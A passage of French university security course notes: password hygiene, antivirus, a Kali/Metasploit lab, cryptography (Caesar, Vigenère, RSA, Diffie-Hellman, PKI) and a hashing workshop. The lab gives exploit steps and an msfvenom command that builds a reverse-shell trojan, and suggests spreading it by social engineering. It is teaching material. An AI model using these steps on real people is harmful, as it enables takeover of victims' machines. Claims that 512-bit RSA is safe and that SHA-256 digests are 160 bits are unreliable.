 Rallonger le plus possible le mot de passe ou la clé si cela est possible ;
 Utiliser la plus grande gamme de symboles possibles (minuscules, majuscules,
ponctuations, chiffres et autres) ;
 Éviter d'avoir à faire face à une attaque par dictionnaire en rendant la fabrication du
mot de passe réellement aléatoire ;
 Empêcher une personne donnée de dépasser un nombre maximum d'essais du mot de
passe ou de la clé durant une certaine période ;
 Ne jamais partager un compte utilisateur ;
 Ne jamais utiliser le même mot de passe pour différents accès ;
 Ne jamais donner son mot de passe, même aux personnes chargées de la sécurité du
système ;
 Ne jamais écrire sur papier son mot de passe ;
 S'assurer de la déconnexion avant de quitter son poste de travail ou activer l'écran de
veille s'il est protégé par un mot de passe ;

21
 Vulnérabilités, menaces, attaques, et contre-
mesures
 Changer le mot de passe au moindre soupçon de compromission ;
 Ne pas pré-enregistrer vos mots de passe dans les navigateurs, notamment lors de
l'utilisation ou la connexion à un ordinateur public ou partagé (salons, déplacements...).

L'antivirus
L'antivirus est un logiciel de sécurité qui procède, automatiquement ou sur demande, à
l'analyse des fichiers et de la mémoire d'un ordinateur, soit pour empêcher toute introduction
parasite, soit pour détecter et éradiquer tout virus dans un système informatique.
L'antivirus détecte et éventuellement détruit des logiciels malveillants. Historiquement, les
antivirus ne combattaient que les virus. Depuis quelques années les éditeurs d'antivirus ont
rajouté des modules contre les autres types de logiciels malveillants (spyware, backdoor...).
Il est à noter que certains logiciels de sécurités se présentent comme des antimalwares pour
bien faire comprendre qu'ils luttent contre tous les types de logiciels malveillants et pas
seulement contre les virus. Il est même possible de trouver des logiciels qui sont à la fois
antivirus et pare-feu.
On peut classer les antivirus en deux catégories en fonction de la méthode utilisée pour
détecter les virus:
 Les antivirus traditionnels qui disposent d'une base de données des virus qu'ils doivent
chercher et détruire.
 Les antivirus heuristiques qui surveillent en permanence l'activité des logiciels pour
détecter un comportement anormal et ainsi repérer d'éventuels virus.
Certains antivirus utilisent les deux techniques de détection afin de maximiser la sécurité de
l'ordinateur.
Les antivirus traditionnels nécessitent une mise à jour constante de leur base de données. En
effet ces antivirus sont incapable de détecter des virus qui ne sont pas inscrits dans leur base
de données. La valeur de ce type d'antivirus dépend donc de la capacité de son éditeur à
mettre à jour la base de données pour qu'elle contiennent les derniers virus.
Lorsqu'un antivirus cherche un virus, il scanne l'ordinateur. Une fois qu'il a trouvé le virus, il
essaye de le détruire. Parfois le virus s'est inséré dans un fichier utile à l'ordinateur et
l'antivirus ne peut pas le détruire sans risquer d'endommager l'ordinateur. Dans ce cas,
l'antivirus met en quarantaine le fichier. Cela signifie qu'il le met à part et l'empêche de se
reproduire ou de communiquer avec d'autres fichiers.

Parefeu ou firewall
Le firewall ou Pare-feu est un dispositif informatique (logiciel ou ordinateur) qui permet le
passage sélectif des flux d'informations entre le système informatique de l'entité et un réseau
externe, dans le but de neutraliser les tentatives d'accès non autorisé au système en
provenance de l'extérieur de l'entité et de maîtriser les accès vers l'extérieur.
Le pare-feu sépare deux réseaux qui ont des niveaux de sécurité différents. Le pare-feu filtre
les données qui passent d'un réseau à un autre avec pour objectif de repérer les données qui
ne respectent pas des règles fixées par l'utilisateur.
Un pare-feu peut empêcher un pirate de se connecter à votre ordinateur.

* *
*

Dans ce module, nous avons présenté des menaces et des attaques dans un premier temps,
puis les logiciels malveillants dans un second temps avant de présenter les mécanismes de
protection.

22
 III.Attaques et Malware avec KALI Linux
et le Framework Metasploitable 2

Objectifs
 Connaître les types de menaces et d'attaques ;
 Mettre en œuvre un exploit.

Pour apprendre à défendre un système informatique, il faut se mettre, des fois, du côté des
hackers pour voir comment ils agissent. Dans ce TP, nous allons utiliser une machine virtuelle
KALI Linux avec des outils comme Metasploitable, qui nous permettent d'agir comme des
hackers. Le but est purement académique et il faut rester dans ce cadre ; la législation
Burkinabè punit les débordements ; dans certains pays, pour utiliser KALI, il faudrait une
autorisation ....
Dans ce TP, nous utiliserons KALI Linux sur une machine virtuelle pour éviter des effets
indésirables sur nos PC.
Le TP est fait sur un Windows 10 mais devrait marcher sur Ubuntu ou iOS.

1. Installations et configurations

Installations
1. Installer Oracle VirtualBox-6.1.22 ;
2. Importer la machine virtuelle KALI-TP ;
3. Comme c'est linux, la première chose à faire est de mettre à jour KALI ainsi que les
outils:
a. sudo apt-get update ;
b. sudo apt-get upgrade ;
4. Pour les besoins du TP, il serait bien que les machines virtuelles soient sur le même
réseau.

Premiers pas avec KALI Linux et Metasploitable

1. Depuis peu les identifiants par défaut de KALI sont kali/kali et ceux de Metasploitable
sont msfadmin/msfadmin . Connectez vous.
2. Les hackers utilisent KALI Linux pour recueillir des informations sur leurs cibles. Testez
et commentez les commandes suivantes:
a. ifconfig
b. nmap adresseIP où adresseIP est une adresse IP qui vous appartient ou dont vous
avez eu l'autorisation du propriétaire ;
c. lbd domaine où domaine est un nom de domaine qui vous appartient ou dont vous
avez eu l'autorisation du propriétaire ;
3. Les hackers utilisent Metasploitable pour lancer des attaques. LHOST est l'adresse IP de
l'attaquant, LPORT est le port que l'attaquant souhaite utiliser, RHOST est l'adresse IP
de la machine victime (cible) et RPORT, le numéro de port de la victime. Lancez
Metaploitable, testez et commentez les commandes suivantes:
a. sudo service postgresql start
b. sudo msfdb init
c. sudo msfconsole
4. Scanner 192.168.43.31 pour des vulnérabilités avec la commande nmap -sV
192.168.43.31
5. Voir les exploits disponibles sur telnet avec la commande search telnet

23
 Attaques et Malware avec KALI Linux et le
Framework Metasploitable 2
6. Voir les détails d'un exploit avec la commande info
exploit/linux/misc/asus_infosvr_auth_bypass_exec
7. Pour utiliser un exploit, utiliser la commande use
exploit/linux/misc/asus_infosvr_auth_bypass_exec
8. Pour définir la cible, il y a deux commandes :
a. SET RHOST 192.168.43.31
b. SET RPORT 23
9. Pour lancer l'exploit, utiliser la commande exploit
10. Si les étapes précédentes ont réussies, vous avez l'accès en commande à la cible. Dans
ce cas tester et commenter :
a. whoami
b. hostname
c. uname -a
d. id
e. ifconfig

2. Exploits et Virus

Tester un exploit
Dans cette partie nous allons tenter un autre exploit. Testez et commentez :
1. show exploits
2. search ssh_version
3. use auxilliary/fuzzers/ssh/ssh_version_15
4. show options
5. nmap –A domaineCible –p 22 –vv
6. set RHOST adresseLigneprecedente
7. run
Si le port 22 de la cible est ouvert votre attaque aurait réussi sinon vous verrez filtered au
niveau du port ...

Malwares
On peut créer des malwares. Pour créer un virus ciblant Windows, on pourrait utiliser les
commandes suivantes :
msfvenom –p windows/metrepreter_reverse_tcp –f exe –a x86 –-platform windows
LHOST=votreIP LPORT=4444 –o incroyable.exe
Attention, cela va créer dans votre répertoire local un virus incroyable.exe. Pour que ce virus
soit un cheval de Troie, nous pouvons utiliser les commandes suivantes :
1. use multi/handler
2. set PAYLOAD windows/metrepreter_reverse_tcp
3. set LHOST votreIP
4. set LPORT 4444
5. exploit
Puis nous débrouiller (social engineering) pour répandre le virus. Ainsi lorsque la victime lance
le virus (et qu'elle est sur Internet ou sur votre réseau) vous pourrez prendre en main sa
machine.

24
 IV.Cryptographie

1. Généralités sur la cryptographie

Définition : Cryptographie
C'est l'art de transformer un message clair en un message inintelligible pour celui qui ne
possède pas les clés de déchiffrement.

Définition : Cryptanalyse
C'est l'art de décrypter des messages chiffrés.

Définition : Cryptologie
C'est la branche des mathématiques qui traite de la cryptographie et de la cryptanalyse.

Deux ères de la cryptographie

Il y a eu deux ères de la cryptographie :
 La cryptographie classique ou traditionnelle concerne les méthodes cryptographiques
d'avant l'ère de l'informatique et a pour but d'élaborer des méthodes permettant de
transmettre des données de manière confidentielle par chiffrement;
 La cryptographie moderne concerne les méthodes cryptographiques de l'ère de
l'informatique dont le but est de traiter plus généralement des problèmes de sécurité
des communications et de fournir des services de sécurité: (confidentialité,
authentification, intégrité, non-répudiation, ...).

Figure 1 : les systèmes de chiffrement

On annonce une ère future pour le chiffrement quantique (cryptographie quantique)

2. Cryptographie classique ou traditionnelle

Généralités
Comme méthodes, on peut citer :
 Chiffrement mono-alphabétique de Jules César ;
 Chiffrement mono-alphabétique ROT13 ;
 Chiffrement poly-alphabétique de Blaise de Vigenère ;

25
 Cryptographie

 Chiffrement / déchiffrement par la méthode du OUX.

Chiffrement mono-alphabétique de Jules César

 C'est une méthode employée par l'empereur Jules César pour communiquer avec ses
armées en campagne;
 Elle s'applique aux 26 lettres de l'alphabet latin même s'il est possible de l'étendre à
tout le code ASCII;
 Il consiste à remplacer une lettre par celle se trouvant à k positions plus loin dans
l'alphabet de façon circulaire;
 k est appelé le chiffre de César.
Si on choisit le chiffre de César = 12, la substitution des caractères pour chiffrement se fait
suivant la Figure 2 et le retour aux caractères substitués pour déchiffrement se fait suivant la
Figure 3.

Figure 2 : Réalisation du chiffrement

Message en clair à chiffrer : BIENVENUE A OUAGA
Cryptogramme obtenu : NUQZHQZGQ M AGMSM

Figure 3 : Réalisation du déchiffrement

Cryptogramme reçu : NUQZHQZGQ M AGMSM
Message en clair obtenu : BIENVENUE A OUAGA

Chiffrement mono-alphabétique ROT13

 C'est encore employé dans le monde des systèmes d'exploitation Linux ;
 Cela correspond au chiffrement de Jules César avec le chiffre de César = 13 ;
 Comme 13 + 13 = 26, cela fait la boucle et permet de chiffrer et déchiffrer avec la
même méthode/fonction.

Figure 4 : Fonction de chiffrement/déchiffrement mono-alphabétique ROT13

Exemple :
Message en clair : BIENVENUE A OUAGA
Cryptogramme obtenu : OVRAIRAHR N BHNTN

Chiffrement poly-alphabétique de Blaise de Vigenère

Ce chiffrement nécessite :
 un outil de travail appelé le Carré de Vigenère;
 une clé (suite alphabétique d'au plus 26). La longueur de la clé est appelée la période
de chiffrement.

26
 Cryptographie

Figure 5 : Le Carré de Vigenère

Pour l'appliquer, on peut suivre l'algorithme suivant :
1. Choisir sa clé de chiffrement;
2. Recopier sa clé au-dessus du message à chiffrer, en la répétant autant de fois que
nécessaire pour couvrir tout le message à chiffrer;
3. Pour chaque lettre du message à chiffrer :
a. repérer la k-ième ligne du Carré de Vigenère débutant par la lettre correspondante
dans la clé;
b. remplacer la lettre par celle se trouvant à l'intersection de cette k-ième ligne et la
colonne démarrant avec la lettre dans le Carré de Vigenère
Pour le déchiffrement, on applique l'algorithme suivant :
1. Recopier au-dessus du cryptogramme, en la répétant autant de fois que nécessaire
pour couvrir tout le texte, la clé ayant servi au chiffrement;
2. Pour chaque lettre du message à déchiffrer :
a. Trouver la k-ième ligne du Carré de Vigenère débutant par la lettre correspondante
dans la clé;
b. Dans cette k-ième ligne du Carré de Vigenère repérer la lettre et prendre le symbole
de début de la colonne correspondante comme résultat du déchiffrement.

Chiffrement / déchiffrement par la méthode du OUX

C'est une technique qui nécessite une clé (suite de bits de longueur égale à celle des blocs
issus du découpage du message à chiffrer). L'algorithme correspondant est comme suit :
1. Sur chaque bloc du message à chiffrer/déchiffrer recopier la clé de chiffrement;
2. Effectuer le OUX bit à bit sur chaque bloc, ce qui produit un bloc chiffré ;
3. Le cryptogramme du message est obtenu en concaténant tous les blocs.

27
 Cryptographie

3. Cryptographie moderne

Rappel : Mécanismes de base de la sécurité

Les protocoles et logiciels assurant la sécurité sur la base d'algorithmes cryptographiques
fournissent :
 La confidentialité;
 L'authentification;
 L'autorisation ;
 L'intégrité;
 La non-répudiation;
 La protection contre les attaques du type Man in the middle;
 La protection contre les détournements d'accès;
 etc.

Lien entre confidentialité et chiffrement

 La confidentialité se rapporte au caractère caché d'un document par rapport à toute
entité non autorisée à en connaître la teneur ou le contenu ;
 Le chiffrement est l'pération assurant la confidentialité d'un message. Il est fait grâce à
des fonctions mathématiques (algorithmes de chiffrement) appliquées sur le message
en utilisant une variable appelée clé de chiffrement ;
 Le résultat d'un chiffrement de message est le cryptogramme ;
 Pour déchiffrer un cryptogramme, on utilise aussi des fonctions mathématiques
(algorithmes de déchiffrement) compatibles avec le premier ensemble avec une clé de
déchiffrement.

Types de chiffrement
Il existe 2 types de chiffrement :
 Chiffrement symétrique (clé secrète) : la clé de chiffrement et celle de déchiffrement
sont les mêmes;
 Chiffrement asymétrique (clé publique) : les clés de chiffrement et de déchiffrement
sont différentes.
Il est possible de combiner les 2 types.

Cryptographie symétrique
 Pour assurer la confidentialité :
- on chiffre le message avec la clé secrète partagée avec le destinataire seul;
- la personne avec laquelle on partage la clé secrète peut alors déchiffrer le message.
 Deux problèmes se posent dans ce type de chiffrement :
- Comment envoyer la clé au destinataire ? cela nécessite un canal sécurisé pour le
partage des clés ;
- Si on a n interlocuteurs, le nombre de clés à distribuer devient important : n(n-1)/2

Figure 6 : Illustration de la cryptographie symétrique

28
 Cryptographie

Algorithme Nom et commentaires Type de chiffrement Taille de la clé Normes

FIPS Pub 81,
ANSI X3.92,
X3.105, X3.106,
ISO 8372,
DES Data Encryption Standard Blocs de 64 bits 56 bits ISO/IEC 10116
International Data Encryption
IDEA Algorithm Blocs de 64 bits 128 bits
Variable 40/128 Pas de norme et
RC2 Blocs de 64 bits bits Propriétaire
Pas de norme
mais divulgué
Variable 40/128 sur Internet en
RC4 Enfilé bits 1994
Blocs de 32, 64 ou Variable 2048 Pas de norme et
RC5 128 bits bits Propriétaire
Confidentiel, developpé aux
USA par la NSA pour des
applications sur la carte Secret défense
SKIPJACK PCMCIA Blocs de 64 bits 80 bits aux USA
Triple DES Blocs de 64 bits 112 bits ANSI X9.52
Tableau 1 : algorithmes de cryptographie symétrique

Cryptographique asymétrique
Connue sous le nom de cryptographie à clé publique elle est basée sur le partage de clés
publiques entre utilisateurs. Son principe a été introduit en 1976 par Diffie-Hellman. L'objectif
est d'échanger des clés à travers un canal non sécurisé. Les caractéristiques principales sont :
 Les clés sont créées par couple clé privée / clé publique associées (on décide
arbitrairement qu'une est publique et l'autre privée);
 Son principe est que tout message chiffré avec une clé publique est déchiffré avec la clé
privée associée ;
 La connaissance d'une des deux clés ne permet pas de déduire l'autre.
Pour assurer la confidentialité :
 On chiffre le message avec la clé publique du destinataire;
 Seule la personne qui possède la clé privée associée à la clé de chiffrement peut
déchiffrer le message.

29
 Cryptographie

Figure 7 : Illustration de la cryptographie asymétrique

L'intégrité est assurée par la signature :
 On crée une empreinte du message avec une fonction de hachage;
 On chiffre l'empreinte avec la clé privée de l'émetteur;
 Tout le monde peut vérifier que l'empreinte correspond bien à l'émetteur en déchiffrant
avec la clé publique de celui-ci.

Figure 8 : algorithmes de cryptographie asymétrique

Souvent, chaque utilisateur possède 2 couples de clés ; un pour le chiffrement et l'autre pour
la signature.

RSA
C'est le plus populaire des systèmes à clé publique. Inventé en 1978 par Ronald Rivest, Adi
Shamir et Leonard Adelman (Origine du sigle RSA), son fonctionnement est basé sur la
difficulté de factoriser de grands entiers qui sont le produit de deux grands entiers premiers.
Il existe plusieurs modes de RSA :
 Mode faible : les clés RSA sont de 384 bits et les clés de cette taille sont cassables ;
 Mode commercial : les clés RSA sont de 512 bits et sont considérées comme sûres pour
le grand public ;
 Mode renforcé : les clés RSA sont de 1024 bits et sont incassables même avec des
moyens énormes (domaine militaire).

30
 Cryptographie

Le fonctionnement est le suivant :

 Calculer les clés :
- Choisir 2 grands nombres premiers p et q (512 bits) ;
- Calculer n = p.q (1024 bits), devant servir pour le modulo ;
- Choisir e nombre aléatoire premier avec (p-1)(q-1);
- Trouver d tel que e.d = 1 mod[(p-1).(q-1)];
- Clé publique : (n, e) ;
- Clé privée : (n,d).
 Chiffrer en calculant le cryptogramme c à partir du message m : c = me mod(n) ;
 Déchiffrer le message reçu c par la formule : m = cd mod(n).
Le RSA en tant qu'algorithme de chiffrement asymétrique résout les problèmes de la
cryptographie symétrique. Seulement RSA est 100 à 1000 fois plus coûteux en temps de calcul
que les algorithmes de cryptographie symétrique (comme 3DES). Pour solutionner ce temps de
calcul, il faut faire le chiffrement asymétrique uniquement pour l'échange de la clé de
chiffrement symétrique ; c'est le principe de l'algo Diffie-Hellman.

Diffie-Hellman
C'est un système utilisé pour l'échange de clés dans un canal public non sécurisé. Il utilise
deux constantes :
 Un nombre premier p (au moins 1024 bits) ;
 Un nombre g (d'ordre maximal p-1).

Figure 9 : Illustration de l'algorithme Diffie-Hellman

Par exemple :
1. p=419 et g = 7 (constantes)
2. Awa tire aléatoirement a = 178
3. Awa calcule x = 7178 modulo 419 = 208 et l'envoie à Baba
4. Baba tire aléatoirement b = 344
5. Baba calcule y = 7344 modulo 419 = 49 et l'envoie à Awa
6. Awa calcule le secret SA=49178 modulo 419 = 107
7. Baba calcule le secret SB=208344 modulo 419 = 107
Il existe une amélioration de l'algorithme de Diffie-Hellman comme illustrée à la Figure 10.
Son principe est le suivant :
1. Awa envoie sa contribution x à Baba ;
2. Baba en déduit la clé secrète de session SB = SAB ;
3. Baba crée une signature basée sur sa valeur publique y et celle de Awa , chiffre cette
signature avec la clé de session SAB et envoie le tout à Awa ;
4. Awa calcule à son tour la clé de session SA = SAB et l'emploie pour déchiffrer la
signature de Baba ;
5. Awa vérifie la signature de Baba. Son intégrité lui garantit que Baba a bien reçu sa
valeur publique et que la valeur publique reçue est bien celle de Baba ;

31
 Cryptographie

6. Awa envoie à Baba une signature basée sur les deux valeurs publiques, et la chiffre
avec la clé de session SAB ;
7. Enfin, Baba déchiffre ce message en s'assurant que la clé est connue des deux
personnes, et vérifie la signature pour s'assurer que Awa a bien reçu sa valeur
publique.

Figure 10 : Principe de l'algorithme de Diffie-Hellman amélioré

Comparaison des systèmes cryptographiques

Système symétrique Système asymétrique
- Clés de petite taille - Clés difficiles à casser car longues
- Algorithmes simples (milliers de bits)
- Temps de calcul très réduit (usage - Algorithmes difficiles à casser car
Avantages
dans des contextes où la ressource complexes
CPU est limitée) - Pas besoin de gérer un très grand
nombre de clés par entité communicante
- Clés faciles à casser (petite taille) - Temps de déchiffrement important
- Difficultés à garantir le secret des (grande taille des clés)
Inconvénients clés - Algorithmes difficiles à implémenter
- Nécessité de gérer un grand car complexes
nombre de clés lorsqu’on appartient - Nécessité d’infrastructures de gestion
à une communauté nombreuse des clés
Tableau 2 : comparaison des systèmes cryptographiques
Il est possible de combiner les deux systèmes :
 En utilisant le système asymétrique pour la distribution et la gestion des clés de
chiffrement et déchiffrement ;
 Et en utilisant le système symétrique pour la réalisation du chiffrement et du
déchiffrement.

4. Signature électronique ou numérique

Notion de signature
C'est un procédé permettant de garantir l'authenticité de l'expéditeur (émetteur), de vérifier
l'intégrité et d'assurer la non-répudiation d'un message. C'est est un condensé ou une
empreinte de message crypté joint au message concerné.

32
 Cryptographie

Principe de la signature
 La signature débute par l'emploi d'une fonction de hachage :
- cohérente car elle génère toujours le même condensé associé à un message donné ;
- unique car deux messages différents ne doivent jamais produire le même condensé
(absence ou risque faible de collisions) ;
- non réversible car ne permettant pas de retrouver le message à partir de son
condensé.
 Le condensé est appelé empreinte digitale (fingerprint) du message ou encore
condensat ;
 Le chiffrement du condensé avec la clé privée de l'expéditeur termine la production de
la signature.

Figure 11 : Illustration de la signature numérique

Exemple : Exemples d'algorithmes de hachage courants

Comme algorithmes de hachage, on peut citer :
 MD5 (Message Digest 5) : cet algorithme a été développé par R. Rivest, l'un des pères
de RSA. Il génère une empreinte de 128 bits (16 octets) et s'applique à un message ou
au contenu d'un fichier ;
 SHA-1 (Secure Hash algorithm 1) : il a été créé par l'organisme de normalisation
américain NIST (National Institute of Standards). La taille du condensat généré est de
160 bits (20 octets) ;
 SHA-256, SHA-512 (Secure Hash algorithm 256 ou 512) : il a été aussi créé par
l'organisme de normalisation américain NIST (National Institute of Standards) et la
taille du condensat généré est de 160 bits (20 octets) ;
 HMAC (Hashed Message Authentication Code) : il emploie une clé secrète concaténée
au message pour produire l'empreinte et s'appuie à la fois sur MD5 et SHA-1
(HMAC_MD5 et HMAC_SHA1).

33
 Cryptographie

Diffie-Hellman résistant à l'attaque Man In The Middle (MITM)

Figure 12 : illustration de Diffie-Hellman résistant au MITM

Le principe est le suivant :
1. Awa envoie sa contribution x à Baba ;
2. Baba en déduit la clé secrète de session SB ;
3. Baba crée une signature basée sur sa valeur publique y et celle de Awa, chiffre cette
signature avec la clé de session SB et envoie le tout à Awa ;
4. Awa calcule à son tour la clé de session S B et l'emploie pour déchiffrer la signature de
Baba ;
5. Awa vérifie la signature de Baba. Son intégrité lui garantit que Baba a bien reçu sa
valeur publique et que la valeur publique reçue est bien celle de Baba ;
6. Awa envoie à Baba une signature basée sur sur les deux valeurs publiques, et la chiffre
avec la clé de session SB ;
7. Enfin, Baba déchiffre ce message, s'assurant que la clé est connue de deux personnes,
et contrôle la signature pour s'assurer que Awa a bien reçu sa valeur publique.

Complément : Robustesse des signatures

La probabilité pour que deux signatures électroniques prises au hasard soient identiques, avec
des signatures RSA de 1024 bits, est 2-1024 c'est-à-dire 10-308.
La probabilité pour que les clés RSA de deux personnes ayant choisi leur clé par elles-mêmes
soient identiques, étant donné que la densité des nombres premiers est très forte (X/Log(X)),
est 2-1004 c'est-à-dire 10-302.
La « difficulté » pour que deux messages différents aient le même condensé est de l'ordre de
280 soit environ 1024 lorsqu'on emploie l'algorithme de hachage SHA-1.
La « difficulté » pour que deux messages différents aient le même condensé est de l'ordre de
232 soit environ 1011 lorsqu'on emploie l'algorithme de signature de type MAC (Message
Authentication Code) utilisant DES produisant un bloc de 64 bits.

34
 Cryptographie

Problématique de la gestion des clés

Dans un système asymétrique, on utilise une paire de clés (privée en possession de
l'utilisateur et publique qui doit être publiée) et un annuaire pour la publication des clés
publiques.
Pour assurer une sécurité dans le réseau, il faut que la publication assure que :
 la clé corresponde bien à la personne avec qui l'échange va être effectué ;
 le possesseur de cette clé est digne de confiance ;
 la clé est toujours valide.
C'est ce qui justifie l'utilisation de la certification.

5. Certificat

Définition : Notion de certificat

C'est un document électronique qui associe une clé publique à une entité afin d'en assurer la
validité. Son objet est de garantir ou cautionner une clé publique. Il est délivré par un tiers de
confiance appelé autorité de certification (notée CA pour Certification authority) et est signé
(au sens signature numérique) par la CA qui possède elle-même un certificat. Son rôle est
d'assurer la non-usurpation d'identité.

Figure 13 : Illustration d'un certificat

Contenu du certificat
Un certificat est composé de 2 parties :
 une partie contenant les informations (Data) ;
 et un partie contenant la signature de l'autorité de certification.

35
 Cryptographie

Comme exemples d'informations on peut avoir :

 la version du certificat ;
 le numéro de série du certificat ;
 le type de méthodes de signature (algorithmes et paramètres) ;
 l'identification de la CA ;
 la période de validité du certificat ;
 le nom distinctif du propriétaire ;
 la clé publique.
 Signature de la CA sur l'ensemble des champs précédents

Vérification du certificat
Pour vérifier un certificat, il faut :
 Vérifier la date de validité du certificat et l'usage prévu pour ce certificat ;
 Vérifier que le certificat n'est pas révoqué en utilisant la liste de révocation (CRL) de la
CA émettrice ;
 Vérifier que la CA est une CA de confiance ;
 Vérifier la signature du certificat avec la clé publique de l'autorité de certification

Figure 14 : vérification d'un certificat

Standards
Il y a deux grands standards de certificat :
 Le standard X509 conçu pour fournir des services de répertoires sur de grands réseaux
informatiques ;
 Les standards PKCS conçus par RSA Security. Certains de ces standards (en particulier
le standard PKCS 12) sont aujourd'hui très largement acceptés par les applications.

6. Infrastructure de gestion de clés

Définition : Notion de PKI

PKI pour Public Key Infrastructure, en français Infrastructure à clés publiques ou infrastructure
de gestion de clés est un système exhaustif de politiques, de processus et de technologies
permettant aux utilisateurs d'un réseau d'échanger de l'information de manière sécurisée et
confidentielle.

36
 Cryptographie

C'est aussi une structure technique et administrative qui permet la mise en place, lors de
l'échange de clés, de relations de confiance entre différentes entités (morales, physiques ou
logiques).
Son rôle est d'assurer la gestion des certificats à clés publiques et de protéger la confidentialité
des secrets qu'elle gère.
Les services de base d'une PKI sont :
 l'authentification ;
 l'intégrité ;
 la non-répudiation ;
 la confidentialité ;
 le contrôle d'accès.

Fonctions principales d'une PKI

Les fonctions principales d'une PKI sont :
 la gestion de la génération et de la distribution des paires de clés publique/privée ;
 la protection des clés privées ;
 la liaison entre les clés publiques et les clés privées données ;
 l'émission et la révocation des certificats ;
 la publication des certificats dans des annuaires ;
 éventuellement, la fourniture d'un service de séquestre et de recouvrement des clés
privées.

Acteurs d'une PKI

Les acteurs d'une PKI sont :
 Les autorités d'enregistrement (RA, Registration Authority) ;
 Les autorités de certification (CA, Certification Authority) ;
 Les porteurs de certificats ;
 Les utilisateurs de certificats ;
 Les services de publication des certificats.

Figure 15 : acteurs d'une PKI

37
 Cryptographie

Cycle de vie d'un certificat

Figure 16 : cycle de vie d'un certificat

Dans la gestion d'un certificat, le PKI peut faire les actions suivantes :
 Enregistrement de demande et vérification des critères pour l'attribution d'un certificat :
l'identité du demandeur est vérifiée ainsi que le fait qu'il soit bien en possession de la
clé privée associée ;
 Création des certificats ;
 Diffusion des certificats ;
 Archivage des certificats pour assurer la sécurité et la pérennité ;
 Renouvellement des certificats en fin de période de validité ;
 Suspension de certificats : elle peut être utile si le propriétaire estime ne pas avoir
besoin temporairement de son certificat ; cependant cette fonction n'est pas aisée à
mettre en oeuvre ; elle est essentiellement administrative et il n'existe pas de standard
d'implémentation ;
 Révocation de certificats : sur date de péremption, perte, vol ou compromission de
clés ;
 Création et publication des listes de révocation des certificats ; cas de révocation du
certificat : date de fin de validité atteinte, clé privée divulguée, perdue ou compromise.

Génération de la clé privée

On peut avoir 2 scénarios de révocation :
 Les utilisateurs génèrent eux-mêmes leur clé privée :
- Cela garantit pour l'utilisateur que personne d'autre ne dispose de sa clé (à
condition qu'il ait confiance dans les outils de génération) ;
- L'utilisateur doit délivrer sa clé publique à la CA pour avoir un certificat ;
- Ce scénario est recommandé pour une clé servant à la signature dont l'unicité
assure la non-répudiation des échanges.
 La CA génère la clé privée :
- C'est un solution simple pour l'utilisateur ;
- Mais il y a copie avant remise des clés de façon sûre à l'utilisateur ; ce qui est
contraire au principe de non-répudiation (sauf si recours à une procédure de non
conservation de copies de clés) ;
- Ce scénario est recommandé pour une clé servant au chiffrement qui peut être
séquestrée.

38
 Cryptographie

Révocation de certificat
Il peut arriver des situations où il faut révoquer les certificats :
 en cas de compromission de la clé privée (perte, vol, ...) ;
 en cas de modification des données d'authentification ;
 en cas de modification des droits, ...
La vérification du certificat d'une personne est de la responsabilité de ses correspondants. Par
exemple, si Baba veut communiquer avec Awa, il doit pouvoir accéder à l'annuaire gérant les
informations sur la validité des certificats.
Plusieurs façons d'implémenter la révocation de certificats existent :
 le mécanisme de publication périodique est la méthode la plus utilisée :
- CRL ;
- ARL : un type de CRL consacré seulement aux informations de révocation associées
à la CA ;
- CRL distribution Points : façon standard de partitionner les CRLs.
 le mécanisme de révocation en ligne, par exemple : Online Certificate Status Protocol
(OCSP).

Les modèles de confiance

La confiance est le sentiment de sécurité de celui qui se fie à quelqu'un ou quelque chose.
L'entité A a confiance en l'entité B, si A est sûr que B aura le même comportement qu'elle
prévoit. La confiance est liée au comportement, réputation, ...
La confiance est nécessaire pour les transactions (opérations commerciales) et les échanges
via un réseau.
Il existe 4 modèles primaires utilisés [Understanding Public-Key Infrastructure] :
 Hiérarchie stricte de CAs : il y a une CA racine et chaque entité est rattachée à la CA
racine à travers zéro ou plusieurs CA intermédiaires. C'e n'est pas approprié pour
Internet;
 Architecture de confiance distribuée : un exemple serait que chaque entreprise déploie
sa PKI et possède sa propre CA racine ;
 Modèle Web : on suppose que les CA racines soient installées dans les navigateurs;
 Confiance centrée sur l'utilisateur (User-Centric trust) : chaque utilisateur est
responsable et décide en quelle personne il aura confiance. c'est le principe de PGP.
.

39
V.Atelier sur la cryptographie

Objectifs
Maîtriser les technologies de la cryptographie

1. Vérifier l'intégrité d'un fichier sur Windows

Avec PowerShell et Get-FileHash

1. Exécuter PowerShell
2. Entrer la commande : Get-FileHash fichier -Algorithm SHA256 | Format-List. Remplacer
SHA256 par la fonction de hachage désirée et fichier par le nom du fichier à vérifier
(pensez à l'auto-complétion) ... L'empreinte est dans le champ HASH.
3. On peut comparer l'empreinte du fichier (Hash2) avec celle de l'expéditeur (Hash1)
avec la commande suivante : Hash1 –eq Hash2.

Avec l'invite de commandes et certutil.exe

1. Lancer l'invite de commande
2. Pour calculer l'empreinte de votre fichier avec certutil, entrer la commande : certutil -
hashfile fichier SHA256. Remplacez SHA256 par la fonction de hachage désirée et
fichier par le nom du fichier à vérifier (pensez à l'auto-complétion) ... L'empreinte est
dans le champ HASH.
3. On peut comparer l'empreinte du fichier (Hash2) avec celle de l'expéditeur (Hash1)
avec la commande suivante : if Hash1 == Hash2 echo True

Avec HashTab
1. Installer HashTab ;
2. Pour calculer l'empreinte de votre fichier :
a. cliquer droit sur le fichier à vérifier et faites Propriétés ;
b. cliquer sur l'onglet Hachages. HashTab calcule automatiquement les empreintes du
fichier selon les fonctions de hachage sélectionnées (définies dans Paramètres) ;
3. Pour vérifier l'intégrité du fichier, collez l'empreinte fournie par l'expéditeur dans le
champ Comparaison de hachages.
4. NB : sur Ubuntu les commandes md5sum fichier, sha1sum fichier et sha256sum
fichier ... permettent de faire pareil.

Travail à faire
1. Créer un fichier texte contenant un petit paragraphe, et calculer l'empreinte numérique
de ce document avec md5, sha1 et sha256 et donnez l'empreinte obtenue avec chaque
algorithme. Donnez la taille de chaque empreinte (en bits).
2. Modifier un caractère dans le fichier texte, et calculez à nouveau les empreintes
numériques md5, sha1 et sha256. Que constatez-vous ?
3. Quelle est l'utilité de l'empreinte numérique ?
4. Laquelle des méthodes d'empreinte numérique précédentes (md5, sha1 et sha256)
recommanderez-vous, et pourquoi ?

40
 Atelier sur la cryptographie

2. Gpg4Win

Généralités
GnuGPG est le logiciel Open Source le plus utilisé au monde pour assurer les services de
confidentialité et authentification de données numériques (fichier / répertoire / email).
 La confidentialité est permise par chiffrement du message.
 L'authentification est gérée par la signature numérique.
GnuGPG est une implémentation Libre de la spécification OpenGPG (RFC 4880). Il ne faut pas
confondre GPG (Gnu Privacy Guard) et le logicel propriétaire Pretty Goog Privacy (PGP) de Paul
